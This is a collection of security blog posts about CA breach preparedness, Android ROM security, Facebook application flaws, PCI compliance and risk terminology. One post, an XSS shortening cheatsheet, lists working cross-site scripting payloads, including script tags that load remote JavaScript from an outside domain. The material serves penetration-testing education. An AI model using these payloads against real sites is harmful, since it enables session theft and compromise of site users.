Are You Prepared for Certificate Authority Breaches?

By Nate Couper

In the last few years, security breaches involving fraudulently issued SSL certificates, as well as compromises of a number of certificate authorities (CA’s) themselves, have exposed gaps in the foundations of online security.

  • DigiNotar
  • Comodo
  • VeriSign
  • and others

It is no longer safe to assume that CA’s, large or small, have sufficient stake in their reputation to invest in security that is 100% effective.  In other words, it’s time to start assuming that CA’s can and will be breached again.

Fortunately for the white hats out there, NIST has just released a bulletin on responding to CA breaches.  Find it on NIST’s website at http://csrc.nist.gov/publications/nistbul/july-2012_itl-bulletin.pdf.

The NIST document has great recommendations for responding to CA breaches, including:

  • Document what certificates and CA’s your organization uses.
  • Document logistics and information required to respond to CA compromises.
  • Review and understand CA’s in active use in your organization.
  • Understand “trust anchors” in your organization.
  • Develop policies for application development and procurement, and implement them.
  • Understand and react appropriately to CA breaches.

Let’s dive into these:

1. Document the certificates and CA’s that your organization uses

Any compliance wonk will tell you that inventory is your first and best control.  Does your organization have an inventory?

Let’s count certificates.  There’s http://www.example.com, www2.example.com, admin.example.com, backend.example.com, and there’s mail.example.com.  There may also be vpn.example.com, ftps.example.com, ssh.example.com.  These are the obvious ones.

Practically every embedded device from the cheapest Wi-Fi router to the lights-out management interface on your big iron systems these days comes with an SSL interface.  Count each of those.  Every router, switch, firewall, every blade server enclosure, every SAN array.  Take a closer look at your desktops.  Windows has a certificate database, Firefox carries its own, Java has its own, and multiple instances of Java on a single system can have multiple CA databases.  Now your servers—every major OS ships with SSL capabilities: Windows, Linux (OpenSSL), Unix.  Look at your applications – chances are every piece of J2EE and .NET middleware has a CA database associated with it.  Every application your organization bought or wrote that uses SSL probably has a CA database.  Every database, every load balancer, every IDS/IPS.  Every temperature sensor, scanner, printer, and badging system that supports SSL probably has a list of CA’s somewhere.

All your mobile devices.  All your cloud providers and all the services they backend to.

If your organization is like most, you probably have an Excel spreadsheet with a list of AD servers, or maybe you query a domain controller when you need a list of systems.  Forget about software and component inventory.  Don’t even think about printers, switches, or cameras.

If you’re lucky enough to have a configuration management database (CMDB), what is its scope?  When was the last time you checked it for accuracy?  In-scope accuracy rates of 75% are “good”, if some of my clients are any measure.  And CMDB scope rarely exceeds production servers.

Each one of these devices may have several SSL certificates, and may trust hundreds of CA’s for no reason other than it shipped that way.

Using my laptop as an example, I’ve got several hundred “trusted” CA’s loaded by default into Java, Firefox, IE and OpenSSL.  Times five or so to account for the virtual machines I frequent.  Of those thousands of CA’s, my system probably uses a dozen or so per day.
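
For a quick sense of scale, a few lines of Python can dump a single trust store.  This is only a sketch of the idea, not an inventory tool: it looks at whatever default store Python’s ssl module happens to load on the machine it runs on, and every other store (Java, Firefox, each embedded device) needs its own tooling.

import ssl

# Count and name the CA certificates in the default trust store that
# Python's ssl module loads on this machine.
ctx = ssl.create_default_context()
cas = ctx.get_ca_certs()

for cert in cas:
    subject = dict(field[0] for field in cert["subject"])
    print(subject.get("organizationName", "?"), "-", subject.get("commonName", "?"))

print(len(cas), "trusted CAs in this one store")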

2. Document logistics and information required to respond to CA breaches

How exactly do you manage the list of trusted CA’s on your iPad anyway?  Your load balancer?  Who is responsible for these devices, and who depends on them? If you found out that Thawte was compromised tomorrow, would you be able to marshal all the people who manage these systems in less than a day?  In a week?

What would it take to replace certificates, to tweak the list of CA’s across the enterprise?  It will definitely take longer if you’re trying to figure it out as you go.

3. Review and understand CA’s in active use in your organization

Of all the hundreds of CA’s on my laptop, I actually use no more than a dozen or so each day.  In fact, it would be noteworthy if more than a handful got used at all.  I could disable hundreds of them and never notice.  After all, I don’t spend a lot of time on Romanian or Singaporean sites, and CA’s from those regions probably don’t see a lot of foreign use.

Most organizations are savvy enough to source their certificates from at most a handful of trusted CA’s.  A server might only need one trusted CA.  Ask your network and application administrators – which CA’s do we trust and which do we need to trust?  It might make sense to preemptively strike some or all of the CA’s you’re not actually using, if only in the name of reducing attack surface.
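
One way to ground that conversation is to look at what is actually presented on the wire.  The sketch below is only illustrative: the host list is a placeholder for the services your organization really uses, and the issuer it reports is usually an intermediate rather than the root, but even that rough cut tends to show how few CA’s you actively depend on.

import socket
import ssl

# Placeholder list: substitute the hosts your organization actually connects to.
hosts = ["www.example.com", "mail.example.com", "vpn.example.com"]

ctx = ssl.create_default_context()
issuers = {}

for host in hosts:
    try:
        with socket.create_connection((host, 443), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                issuer = dict(field[0] for field in tls.getpeercert()["issuer"])
                issuers.setdefault(issuer.get("organizationName", "?"), []).append(host)
    except OSError as exc:
        print(host, "unreachable:", exc)

for ca, names in sorted(issuers.items()):
    print(ca, "->", ", ".join(names))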

4. Understand “trust anchors” within your organization.

Trust anchors are the roots of a PKI – the CA’s whose certificates your systems trust directly, and from which intermediates, registrars, and the users of certificates derive their authority.  Go back through your inventory (you made one of those, right?) and document the configuration.  What do the trust anchors allow and disallow with your certificates?  Will revoked certificates get handled correctly?  How do you configure it?
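
How explicit that configuration is varies by platform, but here is a rough Python sketch of the idea: trust exactly one named anchor and turn on revocation checking.  The file names are placeholders, and a real deployment would also have to keep the CRL current.

import ssl

# Trust only the anchor in "corp-root.pem" (placeholder path) rather than the
# default store, and require a CRL check on the leaf certificate.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cafile="corp-root.pem")   # the single trust anchor
ctx.load_verify_locations(cafile="corp-root.crl")   # revocation list, PEM format
ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF       # fail closed if the leaf is revoked

# Any socket wrapped with ctx now rejects chains that do not terminate at the
# corporate root, and rejects leaf certificates that appear on the CRL.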

Does your organization deploy internal CA’s?  Which parts of the organization control the internal CA’s, and what other parts of the business depend on them?  What internal SLA’s / SLO’s are afforded?  What metrics measure them?

5. Develop policies for application development and procurement.

How many RSA SecurID customers really understood that RSA was holding on to secret information that could contribute to attacks against RSA’s customers?  Did your organization ask RIM if trusted CA’s on your Blackberries could be replaced?  Do you use external CA’s for purely internal applications, knowing full well the potential implications of an external breach?

Does your purchase and service contract language oblige your vendor even to tell you if they do have a breach, or will you have to wait till it turns up on CNN?  Do they make claims about their security, and are their claims verifiable?  Do they coast on vague marketing language, or ride on the coattails of once-hip internet celebrities and gobbled-up startups?

6. Understand CA breaches and react appropriately.

Does your incident response program understand CA breaches?  Can you mobilize your organization to do what it needs to when the time comes, and within operational parameters?

CA breaches have happened before and will happen again.  NIST has again delivered a world-class roadmap for achieving enterprise security objectives.  Is your organization equipped?

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves a much stronger impression of severity when you can at least pop an alert box.

My go-to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some better known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. E.g. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… E.g. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. E.g. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five-letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. That’s still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one-letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. E.g. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think jQuery) loaded, you can call their functions instead of your own. E.g. if they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag, on the other hand, will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one-letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at just 15 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes in at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticeable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment below and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

CyanogenMod 9, An Android ROM Without Root

By Jon Janego

As a follow-up to my blog post in December about custom Android ROMs, I’d like to comment on the news released by the CyanogenMod team last month about their removal of default root access in their upcoming CM9 release.

In a post on their blog a few weeks ago, the CyanogenMod team announced that they were changing the way that they handle root access on devices using their ROM.  Previous releases of their ROM had root access enabled by default, as is common in most custom ROMs.  As a result, any application that requested root access on the device would be granted it.  This is great for some of the power-user applications that are common among the Android modding scene – Titanium Backup is one that comes to mind – but it comes with a significant security risk, since a malicious application installed on the device could have full root access without the user being aware of what it was doing.  The CyanogenMod team acknowledged this in their post, saying, “Shipping root enabled by default to 1,000,000+ devices was a gaping hole.”

What the team is planning to do instead is to implement root access in a selective, user-configurable manner.  A device using the ROM has root access disabled by default, but can be configured to enable it only for ADB console access, only for applications, or across the board.  This type of control leaves it in the hands of the users to choose the level of risk that they are willing to accept.  Obviously, many of the tech-savvy enthusiasts will immediately enable unfettered root access.  However, for the large part of the Android community that is interested in custom ROMs only for the customizable interfaces they offer, this will be a welcome and overdue security protection.  Already, it is clear in the comments to the CyanogenMod post that not everyone understands what the risk of root-level access is – someone asks the community to “explain this for the liberal arts majors.”

Just so it’s clear, the removal of root-level access is strictly at the operating system layer.  Installing a custom ROM onto an Android phone still requires unlocking the bootloader, which on most devices requires running a “jailbreaking” exploit of some sort.  There are a few exceptions to this; the Google Nexus line of phones lets you unlock the bootloader with only some console commands, and HTC and Motorola have also been providing bootloader unlocks for their devices.  Unless it’s coming from the manufacturer, there is always the possibility of some risk when executing unknown code on your device.  But once you’ve gotten to the point of installing the custom ROM, there has historically been the further risk of having root-level access to the operating system easily available, which is the gap that CyanogenMod has closed here.

To me, this indicates that the CyanogenMod team is acknowledging their influence in the community and using it to educate users on good security measures.  Baking in a “secure by default” configuration to the most popular ROM will be good for everyone.  Kudos to them for acknowledging this, and let’s hope that it leads to a more secure Android ecosystem for everyone!

CyanogenMod Logo Used Under a Creative Commons Attribution License

Facebook Applications Have Nagging Vulnerabilities

By Neohapsis Researchers Andy Hoernecke and Scott Behrens

This is the second post in our Social Networking series. (Read the first one here.)

As Facebook’s application platform has become more popular, the composition of applications has evolved. While early applications seemed to focus on either social gaming or extending the capabilities of Facebook, now Facebook is being utilized as a platform by major companies to foster interaction with their customers in a variety of forms such as sweepstakes, promotions, shopping, and more.

And why not?  We’ve all heard the numbers: Facebook has 800 million active users, 50% of whom log on every day. On average, more than 20 million Facebook applications are installed by users every day, while more than 7 million applications and websites remain integrated with Facebook. (1)  Additionally, Facebook is seen as a treasure trove of valuable data accessible to anyone who can get enough “Likes” on their page or application.

As corporate investments in social applications have grown, Neohapsis Labs researchers have been asked to help clients assess these applications and determine what type of risk exposure their release may pose. We took a sample of the applications we have assessed and pulled together some interesting trends. For context, most of these applications are very small in size (2-4 dynamic pages).  The functionality contained in these applications ranged from simple sweepstakes entry forms and contests with content submission (photos, essays, videos, etc.) to gaming and shopping applications.

From our sample, we found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g., Cross-Site Scripting or SQL Injection), and none of the applications were completely free of vulnerabilities. Given that the attack surface of these applications is so small, this is a somewhat surprising statistic.

The most commonly identified findings in our sample group of applications included Cross-Site Scripting, Insufficient Transport Layer Protection, and Insecure File Upload vulnerabilities. Each of these vulnerability classes will be discussed below, along with how the social networking aspect of the applications affects their potential impact.

Facebook applications suffer the most from Cross-Site Scripting. This type of vulnerability was identified on 46% of the applications sampled.  This is not surprising, since this age-old problem still creeps into many corporate and personal applications today.  An application discovered to be vulnerable to XSS could be used to attempt browser-based exploits or to steal session cookies (but only in the context of the application’s domain).

These types of applications are generally framed inline [inline framing, or iframing, is a common HTML technique for framing media content] on a Facebook page from the developer’s own servers/domain. This alleviates some of the risk to the user’s Facebook account since the JavaScript can’t access Facebook’s session cookies.  And even if it could, Facebook uses HttpOnly flags to prevent JavaScript from accessing session cookie values.  But we have found that companies have a tendency to utilize the same domain name repeatedly for these applications, since generally the real URL is never visible to the end user. This means that if one application has an XSS vulnerability, it could present a risk to any other applications hosted at the same domain.

When third-party developers enter the picture all this becomes even more of a concern, since two clients’ applications may be sharing the same domain and thus be in some ways reliant on the security of the other client’s application.

The second most commonly identified vulnerability, affecting 37% of the sample, was Insufficient Transport Layer Protection. While it is a common myth that conducting a man-in-the-middle attack against cleartext protocols is impossibly difficult, the truth is it’s relatively simple.  Tools such as Firesheep aid in this process, allowing an attacker to create custom JavaScript handlers to capture and replay the right session cookies.  About an hour after downloading Firesheep and looking at examples, we wrote a custom handler for an application that was being assessed that only used SSL when submitting login information.  On an unprotected Wi-Fi network, as soon as the application sent any information over HTTP we had valid session cookies, which were easily replayed to compromise the victim’s session.

Once again, the impact of this finding really depends on the functionality of the application, but the wide variety of applications on Facebook does provide an interesting and varied landscape for the attacker to choose from.  We only flagged this vulnerability under specific circumstances where either the application cookies were somehow important (for example, being used to identify a logged-in session) or the application included functionality where sensitive data (such as PII or credit card data) was transmitted.
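
Where application cookies do matter, most of the protection is configuration rather than code.  Here is a minimal sketch of the relevant cookie attributes using Python’s standard library (every web framework exposes equivalent settings):

from http.cookies import SimpleCookie

# If a cookie identifies a logged-in session, mark it Secure so it only travels
# over TLS and HttpOnly so injected JavaScript cannot read it.
cookie = SimpleCookie()
cookie["session"] = "opaque-token-value"   # placeholder value
cookie["session"]["secure"] = True
cookie["session"]["httponly"] = True
cookie["session"]["path"] = "/"

print(cookie.output())   # the Set-Cookie header the application should send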

The third most commonly identified finding was Insecure File Upload. To us, this was surprising, since it’s generally not considered to be one of the most commonly identified vulnerabilities across all web applications. Nevertheless, 27% of our sample included this type of vulnerability. We attribute its identification rate to the prevalence of social applications that include some type of file upload functionality (to share an avatar, photo, document, movie, etc.).

We found that many of the applications we assessed have their file upload functionality implemented in an insecure way.  Most of the applications did not check content type headers or even file extensions.  Although none of the vulnerabilities discovered led to command injection flaws, almost every vulnerability exploited allowed the attacker to upload JavaScript, HTML, or other potentially malicious files such as PDFs and executables.  Depending on the domain name affected by this vulnerability, this flaw could aid an attacker’s social engineering efforts, since the attacker now has malicious files hosted on a trusted domain.
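
As a rough sketch of the kind of server-side check that was missing, an allow-list of extensions and declared content types is a reasonable starting point.  The names below are illustrative; a production check would also inspect the file contents and serve uploads from a separate, untrusted domain.

import os

# Allow-list approach: accept only a small set of image types and reject
# anything a browser might execute (HTML, JavaScript, PDF, executables).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}

def is_upload_allowed(filename, declared_content_type):
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS and declared_content_type in ALLOWED_CONTENT_TYPES

print(is_upload_allowed("avatar.png", "image/png"))   # True
print(is_upload_allowed("evil.html", "text/html"))    # False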

Our assessment also identified a wide range of other types of vulnerabilities. For example, we found several of these applications to be utilizing publicly available admin interfaces with guessable credentials. Furthermore, at least one of the admin interfaces was riddled with stored XSS vulnerabilities. Server configurations were also a frequent problem, with unnecessarily exposed services and insecure configurations repeatedly identified.

Finally, we also found that many of these web applications had some interesting issues that are generally unlikely to affect a standard web application. For example, social applications with a contest component may need to worry about the integrity of the contest. If it is possible for a malicious user to game the contest (for example by cheating at a social game and placing a fake high score) this could reflect badly on the application, the contest, and the sponsoring brand.

Even though development of applications integrated with Facebook and other social networking sites is increasing, we’ve found companies still tend to handle these outside of their normal security processes. It is important to realize that these applications can present a risk and should be thoroughly examined just like traditional stand-alone web applications.

The Security Implications of Custom Android ROMs

By Jon Janego

As most smartphone geeks like myself are undoubtedly aware, the latest phone in Google’s Nexus line, the Samsung Galaxy Nexus, was released for Verizon Wireless last week.  Mine just arrived last night, and it’s fantastic (although huge!)

The Nexus line of devices is unique among Android phones in that they are essentially a commercial line of the internal development phones used at Google.  As such, they are designed to allow easy installation of custom firmware.  This makes them especially popular with the robust Android “modding” community, which develops customized firmware that extends the functionality of Android devices beyond what is initially provided by the handset manufacturer.

Made for Modders

The Galaxy Nexus appears to be the biggest Nexus phone launch in Google’s history, initially being offered by the largest carrier in the US, Verizon, and the second-largest carrier in the UK, O2.  The popularity of the Galaxy Nexus will likely draw a large number of people into the Android modding community because of the low barrier to entry that it presents.  Already, on the popular Android blog Droid Life, there is an article about unlocking the Galaxy Nexus’ bootloader, which allows for installation of custom firmware, that has over 400 comments, and another post on the same blog about “rooting” the phone has well over 300 comments.

The Android customization community is a large and robust one.  However, like many open-source and community-based development projects, the majority of users just want the project to “work”, and have little-to-no interest in viewing the source code or having a deep understanding of how it functions.  Despite user bases sometimes numbering in the millions, a relatively small group of developers do most of the creation and distribution of the software.

The problem of software authenticity has been encountered before by the Linux community, and over the last decade that community has developed distribution methods, such as centralized Debian APT repositories, that provide some degree of certainty over what the end user is actually installing on their computer.  Additionally, many Linux users still download the source code for projects and compile it locally on their computer.  Within the Android modding community, neither of these options has been implemented with the same level of maturity that Linux has seen.  The more popular aftermarket firmware, or “ROMs”, such as CyanogenMod, are distributed by more accountable means, providing MD5 checksums for the files and a clear distribution network.  Often, however, Android customization software is provided through links to anonymous file-sharing sites such as Mediafire and Megaupload.  This creates the opportunity to trick a user into installing malicious files.

A Ripe Target

There has already been at least one documented case of malware targeting custom Android ROMs: a trojan that affected devices in the Chinese market.  With the popularity of the Galaxy Nexus and the continued interest in the Android customization community, this could become an attack vector that is more and more appealing to malware authors.  And because the majority of customized Android software is distributed outside the Android Market, users do not have the additional protection that the Market provides, namely the “kill switch” for apps installed via the Android Market that Google has flagged as malicious.

So how can end users protect themselves, while still participating in the Android customization community?  The most important thing that any technology user can do is to educate themselves about the software they install.  Security researcher Dan Rosenberg wrote an excellent blog post summarizing exactly how “rooting” works – a concept that many users want, but fewer truly understand.  Too often, users are tempted to just install the attachment that someone on a forum or blog says “works”, without question.  Users should also avoid downloading and installing software from sources that are anonymous or unaccountable.  Instead, download from the primary source of the software developer, and validate the MD5 checksum of the file before installing it.  Often, many of the files shared on forums or anonymous upload sites are those provided directly by Google or the phone manufacturers themselves.  Instead of downloading from the anonymous links, download these files from Google directly.
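
The checksum step takes only a few lines.  Here is a small sketch (the file name and expected digest are placeholders; use the values the developer actually publishes):

import hashlib

def md5sum(path, chunk_size=8192):
    # Hash the file in chunks so even a large ROM image never has to fit in memory.
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

expected = "0123456789abcdef0123456789abcdef"   # digest published by the ROM developer
actual = md5sum("cm9-placeholder.zip")           # the file you downloaded
print("checksum OK" if actual == expected else "MISMATCH - do not install", actual)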

The Android community is already beginning to tackle these problems.  The popular ROM manager ClockworkMod is attempting to become an authoritative source for aftermarket software.  They coordinate with the developers of custom software and allow users to install files directly from the developers’ Git repositories.  However, this is still reliant upon the goodwill and trustworthiness of the developers.  ClockworkMod does not perform any code review of the ROMs that they aggregate, and while they may be able to de-list one that has a security vulnerability, there is still not a way to automatically remove the software from installed devices.

Looking Forward

In the future, I hope that the popular Android blogs such as Droid-Life, and forums such as XDA-developers, will begin linking to central, trusted software repositories rather than the anonymous file-sharing sites or forum post attachments that are currently commonly used.  In the long term, I would not be surprised to see an even more formalized system implemented by the Android community, similar to the Debian APT repositories, but there is still some way to go.  Until then, Android users interested in customizing their devices should try to stay educated about their technology, and be very skeptical of any software that they install.  While the mobile carriers have recently had some credibility issues with the CarrierIQ fiasco, they are for the most part held far more accountable than any custom ROM developer will ever be.  Given the sensitivity of the data stored on mobile devices, a user should think very carefully about what they are willing to install onto them.

As for me, I have already unlocked the bootloader on my Galaxy Nexus, but will probably refrain from installing any custom third-party ROMs until I repurpose it as a research device, at least another year or two down the road.  But the draw of the enhanced features and controls that the custom ROMs provide will likely lead many users down that path.  The integrity of your data ultimately resides with you, so I hope that everyone carefully weighs the decision to install new firmware onto their most sensitive and personal piece of technology.  Be careful out there!

What Security Teams Can Learn From The Department of Streets & Sanitation

As I sit here typing in beautiful Chicago, a massive blizzard is just starting to hit outside.  This storm is expected to drop between 12 and 20 inches of snow over the next 24 hours, which could be the most snowfall in over 40 years.  Yet in spite of the weather, the citizens and city workers remain calm, confident in the fact that they know how to handle an incident like this.  A joke has been going around on Twitter about the weather today – “Other cities call this a snowpocalypse.  Chicago calls it ‘Tuesday’”.

Northern cities like Chicago have been dealing with snowstorms and snow management for decades, and have gotten pretty good at it.  Yet when cities fail at it, there can be dramatic consequences – in 1979, the incumbent mayor of Chicago, Michael Bilandic, lost to a challenger, with his poor response to a blizzard cited as one of the main reasons for his defeat.

The same crisis management practices, as well as the same negative consequences attached to failure, apply to information security organizations today.  Security teams should pay attention to what their better established, less glamorous counterparts in the Department of Streets and Sanitation do to handle a crisis like two feet of snow.

So, how do cities adequately prepare for blizzards?  The preparations can be summarized into four main points:

  • Prepare the cleanup plan in advance
  • Get as much early warning as possible
  • Communicate with the public about how to best protect themselves
  • Handle the incident as it unfolds to reduce loss of continuity

These steps are all also hallmarks of a mature security program:

  • Have an incident response plan in place in advance of a crisis
  • Utilize real-time detection methods to understand the situation
  • Ensure end users are aware of the role that they play in information security
  • Remediate security incidents with as little impact to the business as possible

An information security program that is proactive in preparing for security incidents is one that is going to be the most successful in the long run.  It will gain the appreciation of both end users and business owners, by reducing the overall impact of a security event.  Because as winter in Chicago shows us – you can’t stop a snowstorm from coming.  Security incidents are going to happen.  The test of a truly mature organization is how they react to the problem once it arrives.

Response to Visa’s Chief Enterprise Risk Officer comments on PCI DSS

Visa’s Chief Enterprise Risk Officer, Ellen Richey, recently presented at the Visa Security Summit on March 19th. One of the valuable points she made was a defense of the value of implementing PCI DSS to protect against data theft. In addition, Ellen Richey spoke about the challenge organizations face in not only becoming compliant, but proactively maintaining compliance, defending against attacks and protecting sensitive information.

Recent compromises of payment processors and merchants that were stated to be PCI compliant have brought criticism to the PCI program. Our views are strongly aligned with the views presented by Ellen Richey. While the current PCI program requires an annual audit, this audit is simply an annual health check. Think of the PCI audit like a state vehicle inspection: even though everything on your car checks out at the time of the inspection, that does not prevent your brake lights from going out days later. You would still have a valid inspection sticker, but you would no longer be in compliance with safety requirements. It is the owner’s responsibility to ensure the car is maintained appropriately. Similarly, in PCI it is the company’s responsibility to ensure the effectiveness and maintenance of controls to protect their data in an ongoing manner.

Ellen Richey also mentioned increased collaboration with the payment card industry, merchants and consumers. Collaboration is a key step to implementing the technology and processes necessary to continue reducing fraud and data theft. From a merchant, service provider and payment processor perspective, new technologies and programs will continue to reduce transaction risk, but there are areas where these organizations need to proactively improve today. The PCI DSS standard provides guidance around the implementation of controls to protect data. In addition to protecting data, though, merchants, service providers and processors need to proactively address their ability to detect attacks and be prepared to respond effectively in the event of a compromise. These are two areas that are not currently adequately addressed by the PCI DSS, and areas where we continue to see organizations lacking.

See the following link to the Remarks by Ellen Richey, Chief Enterprise Risk Officer, Visa Inc. at the Visa Security Summit, March 19, 2009:

http://www.corporate.visa.com/md/dl/documents/downloads/EllenRichey09SummitRemarks.pdf

Weak Application Security = Non-Compliance

I had to post about this one – our general counsel and compliance specialist Dave Stampley wrote an article recently at InformationWeek about the importance of ensuring application security as part of your regulatory compliance efforts. From the article:

Web-application security vulnerabilities pose a unique compliance risk for companies. Unlike compliance failures that take place in the background–for example, an unencrypted business-to-business transmission of sensitive consumer data–application weaknesses are open to discovery by any skilled Web surfer and even consumers themselves.

“The FTC appears to be taking a strict liability approach to E-commerce security flaws,” says Mary Ellen Callahan, an attorney at Hogan & Hartson in Washington, D.C., who has represented clients facing government privacy compliance investigations. “White-hat hackers and tipsters have prompted a number of enforcement actions by reporting Web-site flaws they discovered.”

Read the full article here

Whose Risk?

I often get frustrated when we talk about risk, measurement, metrics, and (my new least favorite buzzword) “key performance indicators”, because we (as an industry) have a tendency to drop the audience from the statement of risk.

That may sound confusing, but I’ll illustrate by example. This is a real sentence that I hear far too often:

Doing that presents too much risk.

Unfortunately, that sentence is linguistically incomplete. The concept of “risk” requires specification of the audience – risk to whom/what? This is a similar problem to the one Lakoff presents in Whose Freedom? – certain concepts require a reference to the audience in order to make sense of them. Leaving the audience unspecified is productive when used in marketing (or politics), but creates massive confusion when actually trying to have real, productive discourse.

A recent post at Security Retentive illustrates the kind of confusion that ensues when the audience for risk metrics/measurements isn’t specified. (I have also previously talked (ranted?) about this type of confusion here and here.)

This confusion fundamentally arises from forgetting that risk is relative to an audience. Without that shared perspective, each person in the discourse applies the “risk” to their own situation and comes up with a radically different meaning.

When we talk about, measure, and specify risk, we need to always present the data to a relevant audience: asking “risk to what/whom?” is an important way of ensuring that we don’t remain mired in the kind of confusion that Security Retentive described.